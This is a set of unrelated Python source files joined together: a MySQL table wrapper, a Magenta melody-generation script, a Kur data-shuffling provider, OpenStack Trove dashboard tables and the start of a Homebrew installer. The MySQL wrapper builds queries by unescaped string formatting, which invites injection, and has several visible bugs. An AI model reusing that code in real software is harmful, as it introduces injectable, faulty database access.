if self.cursor is None:
return {}
return self._normalize_dict(self.cursor.fetchone())
def grant(self, db=None, user=None, passwd=None, host=None, priv=None, grant=False):
"""grant permissions """
if db is None:
db = self.dbname
if user is None:
user = self.user
if passwd is None:
passwd = self.passwd
if host is None:
host = self.host
if priv is None:
priv = 'all privileges'
priv = clean_input(priv)
grant_opt =''
if grant:
grant_opt = "with GRANT OPTION"
cmd = "grant %s on %s.* to %s@%s identified by '%s' %s"
self.__execute(cmd % (priv, db, user, host, passwd, grant_opt))
def sql_exec(self, sql):
self.execute(sql)
class SimpleTable:
""" simple MySQL table wrapper class.
Note: a table must have entry ID"""
def __init__(self, table=None, db=None):
self.db = db
if db is None:
CXP.log.error("Warning SimpleTable needs a database connection.")
return None
self._name = None
if table in self.db.table_list:
self._name = table
else:
table = table.lower()
if (table in self.db.table_list):
self._name = table
else:
CXP.log.error("Table %s not available in %s " % (table,db))
return None
self.fieldtypes = {}
ret = self.db.exec_fetch("describe %s" % self._name)
for j in ret:
field = j['field'].lower()
vtype = 'str'
ftype = j['type'].lower()
if ftype.startswith('int'): vtype = 'int'
if ftype.startswith('double'): vtype = 'double'
if ftype.startswith('float'): vtype = 'float'
if ftype.startswith('blob'): vtype = 'blob'
if ftype.startswith('tinyint(1)'): vtype='bool'
self.fieldtypes[field] = vtype
def update_fieldtypes(self):
self.fieldtypes = {}
ret = self.db.exec_fetch("describe %s" % self._name)
for j in ret:
field = j['field'].lower()
vtype = 'str'
ftype = j['type'].lower()
if ftype.startswith('int'): vtype = 'int'
if ftype.startswith('double'): vtype = 'double'
if ftype.startswith('float'): vtype = 'float'
if ftype.startswith('blob'): vtype = 'blob'
if ftype.startswith('tinyint(1)'): vtype = 'bool'
self.fieldtypes[field] = vtype
def check_args(self,**args):
""" check that the keys of the passed args are all available
as table columns.
returns 0 on failure, 1 on success """
return self.check_columns(args.keys())
def check_columns(self,l):
""" check that the list of args are all available as table columns
returns 0 on failure, 1 on success
"""
for i in l:
if not self.fieldtypes.has_key(i.lower()): return False
return True
def select_all(self):
return self.select_where()
def select_where(self,**args):
"""check for a table row, and return matches"""
if (self.check_args(**args)):
q = "select * from %s where 1=1" % (self._name)
for k,v in args.items():
k = clean_input(k)
v = safe_string(v)
q = "%s and %s=%s" % (q,k,v)
# print 'S WHERE ', q
return self.db.exec_fetch(q)
return 0
def select(self,vals='*', where='1=1'):
"""check for a table row, and return matches"""
q= "select %s from %s where %s" % (vals, self._name, where)
return self.db.exec_fetch(q)
def select_one(self,vals='*', where='1=1'):
"""check for a table row, and return matches"""
q= "select %s from %s where %s" % (vals, self._name, where)
return self.db.exec_fetchone(q)
def update(self,where='1=1', **kw): # set=None,where=None):
"""update a table row with set and where dictionaries:
table.update_where({'x':1},{'y':'a'})
translates to
update TABLE set x=1 where y=a
"""
if where==None or set==None:
self.db.write("update must give 'where' and 'set' arguments")
return
try:
s = []
for k,v in kw.items():
if self.fieldtypes.has_key(k):
ftype = self.fieldtypes[k]
k = clean_input(k)
if ftype == 'str':
s.append("%s=%s" % (k,safe_string(v)))
elif ftype in ('double','float'):
s.append("%s=%f" % (k,float(v)))
elif ftype == 'int':
s.append("%s=%i" % (k,int(v)))
s = ','.join(s)
q = "update %s set %s where %s" % (self._name,s,where)
# print 'UPDATE Q ', q
self.db.execute(q)
except:
self.db.write('update failed: %s' % q)
def insert(self, **args):
"add a new table row "
q = []
for k,v in args.items():
q.append("%s=%s" % (k, v))
s = ','.join(q)
qu = "insert into %s set %s" % (self._name, s)
self.db.execute(qu)
def insert_on_duplicate_key_update(self, primary={'id': 0}, update={}):
"insert a row or update a row if a unique key exists"
q = []
ks = []
vs = []
for k, v in primary.items():
ftype = type(v)
if ftype in ['int', 'double']:
v=str(v)
elif ftype =='bool':
v=str(int(v))
elif ftype == 'str':
v='"{}"'.format(v)
elif ftype == 'blob':
v='"{}"'.format(cPickle.dumps(v))
ks.append(field)
vs.append(v)
for k, v in update.items():
ftype = self.fieldtypes[k.lower()]
field = clean_input(k.lower())
if ftype in ['int', 'double']:
v=str(v)
elif ftype =='bool':
v=str(int(v))
elif ftype == 'str':
v='"{}"'.format(v)
elif ftype == 'blob':
v='"{}"'.format(cPickle.dumps(v))
ks.append(field)
vs.append(v)
q.append("%s=%s" % (field, v))
s1 = ','.join(ks)
s2 = ','.join(vs)
s = ','.join(q)
qu = 'insert into %s (%s) values (%s) on duplicate key update %s' % (self._name, s1, s2, s)
self.db.execute(qu)
def get_next_id(self, name='unknown'):
"""
Get a unique id for the current reconstruction attempt.
"""
q = 'insert into recon_id (location) values ("{:s}")'
self.db.sql_exec(q.format(name, time.time()))
q= "select max(id) as id from recon_id"
rid = self.db.exec_fetchone(q)['id']
if rid is not None:
return int(rid)
else:
return 1
def db_insert(self):
def db_insert_decorator(func):
@functools.wraps(func)
def db_wrapper(*args, **kwargs):
#pre
result = func(args, kwargs)
#post
return result
return db_wrapper
return db_insert_decorator
def add_column(self, col_name='col_error', var_type='double', default_value='0'):
q = 'alter table {} add {} {}'
if default_value is '':
def_str = ' default null'
else:
def_str = ' default {}'.format(default_value)
self.db.execute(q.format(self._name, col_name, var_type) + def_str)
def __repr__(self):
""" shown when printing instance:
>>>p = Table()
>>>print p
"""
return "<MyTable name=%s>" % (self._name)
def set_defaults(self):
"""
Checks table for columns without a default value and gives
them one.
"""
self.db.execute('describe {:s}'.format(self._name))
cols = self.db.fetchall()
alter = 'alter table {:s} alter {:s} set default {:s}'
for col in cols:
if col['default'] is None:
if re.match('^int|double|tiny*', col['type']):
log.warning('Setting default value of {:} to 0'.format(col['field']))
self.db.sql_exec(alter.format(self._name, col['field'], str(0)))
elif re.match('^varchar*', col['type']):
log.warning('Setting default value of {:} to ""'.format(col['field']))
self.db.sql_exec(alter.format(self._name, col['field'], '""'))
time.sleep(0.02)
|
|
# Copyright 2019 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generate melodies from a trained checkpoint of a melody RNN model."""
import ast
import os
import time
import magenta
from magenta.models.melody_rnn import melody_rnn_config_flags
from magenta.models.melody_rnn import melody_rnn_model
from magenta.models.melody_rnn import melody_rnn_sequence_generator
from magenta.protobuf import generator_pb2
from magenta.protobuf import music_pb2
import tensorflow as tf
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string(
'run_dir', None,
'Path to the directory where the latest checkpoint will be loaded from.')
tf.app.flags.DEFINE_string(
'checkpoint_file', None,
'Path to the checkpoint file. run_dir will take priority over this flag.')
tf.app.flags.DEFINE_string(
'bundle_file', None,
'Path to the bundle file. If specified, this will take priority over '
'run_dir and checkpoint_file, unless save_generator_bundle is True, in '
'which case both this flag and either run_dir or checkpoint_file are '
'required')
tf.app.flags.DEFINE_boolean(
'save_generator_bundle', False,
'If true, instead of generating a sequence, will save this generator as a '
'bundle file in the location specified by the bundle_file flag')
tf.app.flags.DEFINE_string(
'bundle_description', None,
'A short, human-readable text description of the bundle (e.g., training '
'data, hyper parameters, etc.).')
tf.app.flags.DEFINE_string(
'output_dir', '/tmp/melody_rnn/generated',
'The directory where MIDI files will be saved to.')
tf.app.flags.DEFINE_integer(
'num_outputs', 10,
'The number of melodies to generate. One MIDI file will be created for '
'each.')
tf.app.flags.DEFINE_integer(
'num_steps', 128,
'The total number of steps the generated melodies should be, priming '
'melody length + generated steps. Each step is a 16th of a bar.')
tf.app.flags.DEFINE_string(
'primer_melody', '',
'A string representation of a Python list of '
'magenta.music.Melody event values. For example: '
'"[60, -2, 60, -2, 67, -2, 67, -2]". If specified, this melody will be '
'used as the priming melody. If a priming melody is not specified, '
'melodies will be generated from scratch.')
tf.app.flags.DEFINE_string(
'primer_midi', '',
'The path to a MIDI file containing a melody that will be used as a '
'priming melody. If a primer melody is not specified, melodies will be '
'generated from scratch.')
tf.app.flags.DEFINE_float(
'qpm', None,
'The quarters per minute to play generated output at. If a primer MIDI is '
'given, the qpm from that will override this flag. If qpm is None, qpm '
'will default to 120.')
tf.app.flags.DEFINE_float(
'temperature', 1.0,
'The randomness of the generated melodies. 1.0 uses the unaltered softmax '
'probabilities, greater than 1.0 makes melodies more random, less than 1.0 '
'makes melodies less random.')
tf.app.flags.DEFINE_integer(
'beam_size', 1,
'The beam size to use for beam search when generating melodies.')
tf.app.flags.DEFINE_integer(
'branch_factor', 1,
'The branch factor to use for beam search when generating melodies.')
tf.app.flags.DEFINE_integer(
'steps_per_iteration', 1,
'The number of melody steps to take per beam search iteration.')
tf.app.flags.DEFINE_string(
'log', 'INFO',
'The threshold for what messages will be logged DEBUG, INFO, WARN, ERROR, '
'or FATAL.')
def get_checkpoint():
"""Get the training dir or checkpoint path to be used by the model."""
if ((FLAGS.run_dir or FLAGS.checkpoint_file) and
FLAGS.bundle_file and not FLAGS.save_generator_bundle):
raise magenta.music.SequenceGeneratorError(
'Cannot specify both bundle_file and run_dir or checkpoint_file')
if FLAGS.run_dir:
train_dir = os.path.join(os.path.expanduser(FLAGS.run_dir), 'train')
return train_dir
elif FLAGS.checkpoint_file:
return os.path.expanduser(FLAGS.checkpoint_file)
else:
return None
def get_bundle():
"""Returns a generator_pb2.GeneratorBundle object based read from bundle_file.
Returns:
Either a generator_pb2.GeneratorBundle or None if the bundle_file flag is
not set or the save_generator_bundle flag is set.
"""
if FLAGS.save_generator_bundle:
return None
if FLAGS.bundle_file is None:
return None
bundle_file = os.path.expanduser(FLAGS.bundle_file)
return magenta.music.read_bundle_file(bundle_file)
def run_with_flags(generator):
"""Generates melodies and saves them as MIDI files.
Uses the options specified by the flags defined in this module.
Args:
generator: The MelodyRnnSequenceGenerator to use for generation.
"""
if not FLAGS.output_dir:
tf.logging.fatal('--output_dir required')
return
FLAGS.output_dir = os.path.expanduser(FLAGS.output_dir)
primer_midi = None
if FLAGS.primer_midi:
primer_midi = os.path.expanduser(FLAGS.primer_midi)
if not tf.gfile.Exists(FLAGS.output_dir):
tf.gfile.MakeDirs(FLAGS.output_dir)
primer_sequence = None
qpm = FLAGS.qpm if FLAGS.qpm else magenta.music.DEFAULT_QUARTERS_PER_MINUTE
if FLAGS.primer_melody:
primer_melody = magenta.music.Melody(ast.literal_eval(FLAGS.primer_melody))
primer_sequence = primer_melody.to_sequence(qpm=qpm)
elif primer_midi:
primer_sequence = magenta.music.midi_file_to_sequence_proto(primer_midi)
if primer_sequence.tempos and primer_sequence.tempos[0].qpm:
qpm = primer_sequence.tempos[0].qpm
else:
tf.logging.warning(
'No priming sequence specified. Defaulting to a single middle C.')
primer_melody = magenta.music.Melody([60])
primer_sequence = primer_melody.to_sequence(qpm=qpm)
# Derive the total number of seconds to generate based on the QPM of the
# priming sequence and the num_steps flag.
seconds_per_step = 60.0 / qpm / generator.steps_per_quarter
total_seconds = FLAGS.num_steps * seconds_per_step
# Specify start/stop time for generation based on starting generation at the
# end of the priming sequence and continuing until the sequence is num_steps
# long.
generator_options = generator_pb2.GeneratorOptions()
if primer_sequence:
input_sequence = primer_sequence
# Set the start time to begin on the next step after the last note ends.
if primer_sequence.notes:
last_end_time = max(n.end_time for n in primer_sequence.notes)
else:
last_end_time = 0
generate_section = generator_options.generate_sections.add(
start_time=last_end_time + seconds_per_step,
end_time=total_seconds)
if generate_section.start_time >= generate_section.end_time:
tf.logging.fatal(
'Priming sequence is longer than the total number of steps '
'requested: Priming sequence length: %s, Generation length '
'requested: %s',
generate_section.start_time, total_seconds)
return
else:
input_sequence = music_pb2.NoteSequence()
input_sequence.tempos.add().qpm = qpm
generate_section = generator_options.generate_sections.add(
start_time=0,
end_time=total_seconds)
generator_options.args['temperature'].float_value = FLAGS.temperature
generator_options.args['beam_size'].int_value = FLAGS.beam_size
generator_options.args['branch_factor'].int_value = FLAGS.branch_factor
generator_options.args[
'steps_per_iteration'].int_value = FLAGS.steps_per_iteration
tf.logging.debug('input_sequence: %s', input_sequence)
tf.logging.debug('generator_options: %s', generator_options)
# Make the generate request num_outputs times and save the output as midi
# files.
date_and_time = time.strftime('%Y-%m-%d_%H%M%S')
digits = len(str(FLAGS.num_outputs))
for i in range(FLAGS.num_outputs):
generated_sequence = generator.generate(input_sequence, generator_options)
midi_filename = '%s_%s.mid' % (date_and_time, str(i + 1).zfill(digits))
midi_path = os.path.join(FLAGS.output_dir, midi_filename)
magenta.music.sequence_proto_to_midi_file(generated_sequence, midi_path)
tf.logging.info('Wrote %d MIDI files to %s',
FLAGS.num_outputs, FLAGS.output_dir)
def main(unused_argv):
"""Saves bundle or runs generator based on flags."""
tf.logging.set_verbosity(FLAGS.log)
bundle = get_bundle()
if bundle:
config_id = bundle.generator_details.id
config = melody_rnn_model.default_configs[config_id]
config.hparams.parse(FLAGS.hparams)
else:
config = melody_rnn_config_flags.config_from_flags()
generator = melody_rnn_sequence_generator.MelodyRnnSequenceGenerator(
model=melody_rnn_model.MelodyRnnModel(config),
details=config.details,
steps_per_quarter=config.steps_per_quarter,
checkpoint=get_checkpoint(),
bundle=bundle)
if FLAGS.save_generator_bundle:
bundle_filename = os.path.expanduser(FLAGS.bundle_file)
if FLAGS.bundle_description is None:
tf.logging.warning('No bundle description provided.')
tf.logging.info('Saving generator bundle to %s', bundle_filename)
generator.create_bundle_file(bundle_filename, FLAGS.bundle_description)
else:
run_with_flags(generator)
def console_entry_point():
tf.app.run(main)
if __name__ == '__main__':
console_entry_point()
|
|
"""
Copyright 2016 Deepgram
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import numpy
from . import Provider
from ..utils import DisableLogging
logger = logging.getLogger(__name__)
###############################################################################
class ShuffleProvider(Provider): \
# pylint: disable=too-few-public-methods,abstract-method
""" Data provider that can shuffle data in-sync with support data sources.
# Expected behavior
This extends the list of expected behaviors from the `Provider` base
class.
- Because Providers create new Source iterators for each epoch, and
because each epoch ends whenever any Source iterator terminates (that
is, once the shorted dataset terminates), Providers only shuffle
Sources once every epoch, and can do so at the beginning of each
epoch. There is no need for Sources to indicate when they would like
to be shuffled.
- There are two possibilities when applying shuffles:
1. Past shuffles that have been applied to Sources are persistent,
affecting the Source's data in a non-reverseable way (as far as
the Source is concerned).
2. Shuffles are temporary, and once the Source iterator is
recreated (between epochs), it can be assumed that the data---
prior to another shuffle---is in the same, original ordering.
These distinctions are transparent to the provider, which merely
needs to provide new shuffle indices. But it is possible for the
provider to help orchestrate these (e.g.. by providing reverse
permutations after each epoch).
Now, all Sources must be Shuffleable in order to use shuffling. This
means that even mixed finite/infinite Sources must support the
Shuffleable protocol. Sources that stream data samples (e.g.,
real-time data augmentation generators) could possibly be simplified
if the shuffle is assumed to be "new" after each epoch. Indeed, there
may be performance benefits (cache-coherency) from making certain
assumptions about how the shuffle "ought" to be applied.
Despite this, it would be imprudent to decide that Shuffleable
sources must operate under any particular set of assumptions about
how they store or organize data. Therefore, we opt for (1) and assume
that shuffles are persistent, and leave it to the individual sources
to decide how to combine multiple shuffles.
"""
###########################################################################
def __init__(self, *args, randomize=True, sort_by=None, sortagrad=None,
shuffle_after=None, reverse=None, **kwargs):
""" Create a new data provider that can shuffle shuffleable sources.
# Arguments
sources: dict or list. If this is a list, then it is a list of
Sources. If this is a dictionary, its values are Sources and
its keys are string names that are used by the training process
to determine which nodes in the network should receive which
information.
"""
super().__init__(*args, **kwargs)
if randomize:
for i, source in enumerate(self.sources):
if not source.can_shuffle():
raise ValueError('All data sources must be shuffleable '
'for the provider to able to shuffle them. Source '
'"{}" does not seem to match: {}'.format(
'unknown' if self.keys is None else self.keys[i],
source))
if randomize is True:
if self.entries <= 0:
raise ValueError('Must know how long our shuffleable '
'sources are in order to shuffle them, but all '
'sources seem to be infinite. If this is the case, '
'then set `randomize` to an integer in the '
'Provider\'s constructor, or disable shuffling '
'entirely by setting `randomize` to False.')
self._shuffle_len = self.entries
elif isinstance(randomize, int):
self._shuffle_len = randomize
else:
raise ValueError('`randomize` must be True/False or an '
'integer, but we received: {}'.format(randomize))
self.randomize = True
else:
self.randomize = False
self.reverse = reverse
if sortagrad:
if sort_by or shuffle_after:
raise ValueError('"sortagrad" cannot be used with "sort_by" '
'or "shuffle_after". That is because sortagrad=X is '
'equivalent to sort_by=X, shuffle_after=1.')
sort_by = sortagrad
shuffle_after = 1
if sort_by:
if self.keys is None:
raise ValueError('Cannot use "sort_by" with unnamed sources.')
try:
sort_data = self.sources[self.keys.index(sort_by)]
except ValueError:
raise ValueError('Could not find the "sort_by" key "{}" in '
'list of available sources: {}'
.format(sort_by, ', '.join(self.keys)))
else:
sort_data = None
self.sort_by = sort_by
self.sort_data = sort_data
self.is_sorted = False
self.shuffle_after = shuffle_after or 0
###########################################################################
def add_source(self, source, name=None):
""" Adds a new data source to an existing provider.
"""
if self.randomize:
if not source.can_shuffle():
raise ValueError('Cannot add a non-shuffleable source to an '
'already shuffled provider.')
super().add_source(source, name=name)
if self.randomize is True:
self._shuffle_len = self.entries
###########################################################################
def pre_iter(self):
""" Pre-iteration hook.
This is our opportunity to shuffle the data sources.
"""
super().pre_iter()
if self.randomize:
if self.shuffle_after > 0:
self.shuffle_after -= 1
if self.sort_by and not self.is_sorted:
logger.info('Sorting data by key %s...', self.sort_by)
n = numpy.empty(
(len(self.sort_data), ) + self.sort_data.shape()
)
if self.sort_data.is_derived():
from . import BatchProvider
from ..utils import parallelize
subset = self.get_requirements_for_source(
self.sort_by,
self.sort_data
)
with DisableLogging():
provider = BatchProvider(
sources=subset,
batch_size=1024,
randomize=False
)
start = 0
for batch in parallelize(provider):
batch = batch[self.sort_by]
n[start:start+len(batch)] = batch[:]
start += len(batch)
else:
start = 0
for batch in self.sort_data:
n[start:start+len(batch)] = batch[:]
start += len(batch)
indices = numpy.argsort(n, axis=0)
if indices.ndim > 1:
indices = numpy.array(
[numpy.ravel(x)[0] for x in indices]
)
if self.reverse:
logger.info('Reverse shuffling.')
indices = indices[::-1]
for source in self.sources:
source.shuffle(indices)
self.is_sorted = True
else:
logger.debug('Suppressing shuffle...')
else:
logger.debug('Shuffling...')
indices = numpy.random.permutation(self._shuffle_len)
for source in self.sources:
source.shuffle(indices)
### EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF
|
|
# Copyright (c) 2014 eBay Software Foundation
# Copyright 2015 HP Software, LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core import urlresolvers
from django import shortcuts
from django.template.defaultfilters import title # noqa
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from horizon import messages
from horizon import tables
from horizon.templatetags import sizeformat
from horizon.utils import filters
from horizon.utils import functions
from horizon.utils import memoized
from stashboard import api
from stashboard.content.database_clusters import cluster_manager
from stashboard.content.databases import db_capability
LOG = logging.getLogger(__name__)
ACTIVE_STATES = ("ACTIVE",)
class DeleteCluster(tables.BatchAction):
name = "delete"
icon = "remove"
classes = ('btn-danger',)
help_text = _("Deleted cluster is not recoverable.")
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete Cluster",
u"Delete Clusters",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Scheduled deletion of Cluster",
u"Scheduled deletion of Clusters",
count
)
def action(self, request, obj_id):
api.trove.cluster_delete(request, obj_id)
class LaunchLink(tables.LinkAction):
name = "launch"
verbose_name = _("Launch Cluster")
url = "horizon:project:database_clusters:launch"
classes = ("btn-launch", "ajax-modal")
icon = "cloud-upload"
class ClusterGrow(tables.LinkAction):
name = "cluster_grow"
verbose_name = _("Grow Cluster")
url = "horizon:project:database_clusters:cluster_grow_details"
def allowed(self, request, cluster=None):
if (cluster and cluster.task["name"] == 'NONE' and
db_capability.can_modify_cluster(cluster.datastore['type'])):
return True
return False
class ClusterShrink(tables.LinkAction):
name = "cluster_shrink"
verbose_name = _("Shrink Cluster")
url = "horizon:project:database_clusters:cluster_shrink_details"
def allowed(self, request, cluster=None):
if (cluster and cluster.task["name"] == 'NONE' and
db_capability.can_modify_cluster(cluster.datastore['type'])):
return True
return False
class ResetPassword(tables.LinkAction):
name = "reset_password"
verbose_name = _("Reset Root Password")
url = "horizon:project:database_clusters:reset_password"
classes = ("ajax-modal",)
def allowed(self, request, cluster=None):
if (cluster and cluster.task["name"] == 'NONE' and
db_capability.is_vertica_datastore(cluster.datastore['type'])):
return True
return False
def get_link_url(self, datum):
cluster_id = self.table.get_object_id(datum)
return urlresolvers.reverse(self.url, args=[cluster_id])
class UpdateRow(tables.Row):
ajax = True
@memoized.memoized_method
def get_data(self, request, cluster_id):
cluster = api.trove.cluster_get(request, cluster_id)
try:
# TODO(michayu): assumption that cluster is homogeneous
flavor_id = cluster.instances[0]['flavor']['id']
cluster.full_flavor = api.trove.flavor_get(request, flavor_id)
except Exception:
pass
return cluster
def get_datastore(cluster):
return cluster.datastore["type"]
def get_datastore_version(cluster):
return cluster.datastore["version"]
def get_size(cluster):
if db_capability.is_vertica_datastore(cluster.datastore['type']):
return "3"
if hasattr(cluster, "full_flavor"):
size_string = _("%(name)s | %(RAM)s RAM | %(instances)s instances")
vals = {'name': cluster.full_flavor.name,
'RAM': sizeformat.mbformat(cluster.full_flavor.ram),
'instances': len(cluster.instances)}
return size_string % vals
elif hasattr(cluster, "instances"):
return "%s instances" % len(cluster.instances)
return _("Not available")
def get_task(cluster):
return cluster.task["name"]
class ClustersTable(tables.DataTable):
TASK_CHOICES = (
("none", True),
)
name = tables.Column("name",
link=("horizon:project:database_clusters:detail"),
verbose_name=_("Cluster Name"))
datastore = tables.Column(get_datastore,
verbose_name=_("Datastore"))
datastore_version = tables.Column(get_datastore_version,
verbose_name=_("Datastore Version"))
size = tables.Column(get_size,
verbose_name=_("Cluster Size"),
attrs={'data-type': 'size'})
task = tables.Column(get_task,
filters=(title, filters.replace_underscores),
verbose_name=_("Current Task"),
status=True,
status_choices=TASK_CHOICES)
class Meta(object):
name = "clusters"
verbose_name = _("Clusters")
status_columns = ["task"]
row_class = UpdateRow
table_actions = (LaunchLink, DeleteCluster)
row_actions = (ClusterGrow, ClusterShrink, ResetPassword,
DeleteCluster)
def get_instance_size(instance):
if hasattr(instance, "full_flavor"):
size_string = _("%(name)s | %(RAM)s RAM")
vals = {'name': instance.full_flavor.name,
'RAM': sizeformat.mbformat(instance.full_flavor.ram)}
return size_string % vals
return _("Not available")
def get_instance_type(instance):
if hasattr(instance, "type"):
return instance.type
return _("Not available")
def get_host(instance):
if hasattr(instance, "hostname"):
return instance.hostname
elif hasattr(instance, "ip") and instance.ip:
return instance.ip[0]
return _("Not Assigned")
class InstancesTable(tables.DataTable):
name = tables.Column("name",
verbose_name=_("Name"))
type = tables.Column(get_instance_type,
verbose_name=_("Type"))
host = tables.Column(get_host,
verbose_name=_("Host"))
size = tables.Column(get_instance_size,
verbose_name=_("Size"),
attrs={'data-type': 'size'})
status = tables.Column("status",
filters=(title, filters.replace_underscores),
verbose_name=_("Status"))
class Meta(object):
name = "instances"
verbose_name = _("Instances")
class ClusterShrinkAction(tables.BatchAction):
name = "cluster_shrink_action"
icon = "remove"
classes = ('btn-danger',)
success_url = 'horizon:project:database_clusters:index'
help_text = _("Shrinking a cluster is not recoverable.")
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Shrink Cluster",
u"Shrink Cluster",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Scheduled Shrinking of Cluster",
u"Scheduled Shrinking of Cluster",
count
)
def handle(self, table, request, obj_ids):
datum_display_objs = []
for datum_id in obj_ids:
datum = table.get_object_by_id(datum_id)
datum_display = table.get_object_display(datum) or datum_id
datum_display_objs.append(datum_display)
display_str = functions.lazy_join(", ", datum_display_objs)
try:
cluster_id = table.kwargs['cluster_id']
data = [{'id': instance_id} for instance_id in obj_ids]
api.trove.cluster_shrink(request, cluster_id, data)
LOG.info('%s: "%s"' %
(self._get_action_name(past=True),
display_str))
msg = _('Removed instances from cluster.')
messages.info(request, msg)
except Exception as ex:
LOG.error('Action %(action)s failed with %(ex)s for %(data)s' %
{'action': self._get_action_name(past=True).lower(),
'ex': ex.message,
'data': display_str})
msg = _('Unable to remove instances from cluster: %s')
messages.error(request, msg % ex.message)
return shortcuts.redirect(self.get_success_url(request))
class ClusterShrinkInstancesTable(tables.DataTable):
name = tables.Column("name",
verbose_name=_("Name"))
status = tables.Column("status",
filters=(title, filters.replace_underscores),
verbose_name=_("Status"))
class Meta(object):
name = "shrink_cluster_table"
verbose_name = _("Instances")
table_actions = (ClusterShrinkAction,)
row_actions = (ClusterShrinkAction,)
class ClusterGrowAddInstance(tables.LinkAction):
name = "cluster_grow_add_instance"
verbose_name = _("Add Instance")
url = "horizon:project:database_clusters:add_instance"
classes = ("ajax-modal",)
def get_link_url(self):
return urlresolvers.reverse(
self.url, args=[self.table.kwargs['cluster_id']])
class ClusterGrowRemoveInstance(tables.BatchAction):
name = "cluster_grow_remove_instance"
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Remove Instance",
u"Remove Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Removed Instance",
u"Removed Instances",
count
)
def action(self, request, datum_id):
manager = cluster_manager.get(self.table.kwargs['cluster_id'])
manager.delete_instance(datum_id)
def handle(self, table, request, obj_ids):
action_success = []
action_failure = []
action_not_allowed = []
for datum_id in obj_ids:
datum = table.get_object_by_id(datum_id)
datum_display = table.get_object_display(datum) or datum_id
if not table._filter_action(self, request, datum):
action_not_allowed.append(datum_display)
LOG.warning('Permission denied to %s: "%s"' %
(self._get_action_name(past=True).lower(),
datum_display))
continue
try:
self.action(request, datum_id)
# Call update to invoke changes if needed
self.update(request, datum)
action_success.append(datum_display)
self.success_ids.append(datum_id)
LOG.info('%s: "%s"' %
(self._get_action_name(past=True), datum_display))
except Exception as ex:
# Handle the exception but silence it since we'll display
# an aggregate error message later. Otherwise we'd get
# multiple error messages displayed to the user.
action_failure.append(datum_display)
action_description = (
self._get_action_name(past=True).lower(), datum_display)
LOG.error(
'Action %(action)s Failed for %(reason)s', {
'action': action_description, 'reason': ex})
if action_not_allowed:
msg = _('You are not allowed to %(action)s: %(objs)s')
params = {"action":
self._get_action_name(action_not_allowed).lower(),
"objs": functions.lazy_join(", ", action_not_allowed)}
messages.error(request, msg % params)
if action_failure:
msg = _('Unable to %(action)s: %(objs)s')
params = {"action": self._get_action_name(action_failure).lower(),
"objs": functions.lazy_join(", ", action_failure)}
messages.error(request, msg % params)
return shortcuts.redirect(self.get_success_url(request))
class ClusterGrowAction(tables.Action):
name = "grow_cluster_action"
verbose_name = _("Grow Cluster")
verbose_name_plural = _("Grow Cluster")
requires_input = False
icon = "plus"
def handle(self, table, request, obj_ids):
if not table.data:
msg = _("Cannot grow cluster. No instances specified.")
messages.info(request, msg)
return shortcuts.redirect(request.build_absolute_uri())
datum_display_objs = []
for instance in table.data:
msg = _("[flavor=%(flavor)s, volume=%(volume)s, name=%(name)s, "
"type=%(type)s, related_to=%(related_to)s, "
"nics=%(nics)s]")
params = {"flavor": instance.flavor_id, "volume": instance.volume,
"name": instance.name, "type": instance.type,
"related_to": instance.related_to, "nics": instance.nics}
datum_display_objs.append(msg % params)
display_str = functions.lazy_join(", ", datum_display_objs)
cluster_id = table.kwargs['cluster_id']
try:
api.trove.cluster_grow(request, cluster_id, table.data)
LOG.info('%s: "%s"' % (_("Grow Cluster"), display_str))
msg = _('Scheduled growing of cluster.')
messages.success(request, msg)
except Exception as ex:
LOG.error('Action grow cluster failed with %(ex)s for %(data)s' %
{'ex': ex.message,
'data': display_str})
msg = _('Unable to grow cluster: %s')
messages.error(request, msg % ex.message)
finally:
cluster_manager.delete(cluster_id)
return shortcuts.redirect(urlresolvers.reverse(
"horizon:project:database_clusters:index"))
class ClusterGrowInstancesTable(tables.DataTable):
id = tables.Column("id", hidden=True)
name = tables.Column("name", verbose_name=_("Name"))
flavor = tables.Column("flavor", verbose_name=_("Flavor"))
flavor_id = tables.Column("flavor_id", hidden=True)
volume = tables.Column("volume", verbose_name=_("Volume"))
type = tables.Column("type", verbose_name=_("Instance Type"))
related_to = tables.Column("related_to", verbose_name=_("Related To"))
nics = tables.Column("nics", verbose_name=_("Network"))
class Meta(object):
name = "cluster_grow_instances_table"
verbose_name = _("Instances")
table_actions = (ClusterGrowAddInstance, ClusterGrowRemoveInstance,
ClusterGrowAction)
row_actions = (ClusterGrowRemoveInstance,)
|
|
"""Install packages via the MacOSX Homebrew and Linux Linuxbrew package manager.
https://github.com/mxcl/homebrew
https://github.com/Homebrew/linuxbrew
"""
from __future__ import print_function
import contextlib
from distutils.version import LooseVersion
import os
import sys
import yaml
from cloudbio.custom import system, shared
from cloudbio.flavor.config import get_config_file
from cloudbio.fabutils import quiet, find_cmd
from cloudbio.package import cpan
from cloudbio.package.shared import _yaml_to_packages
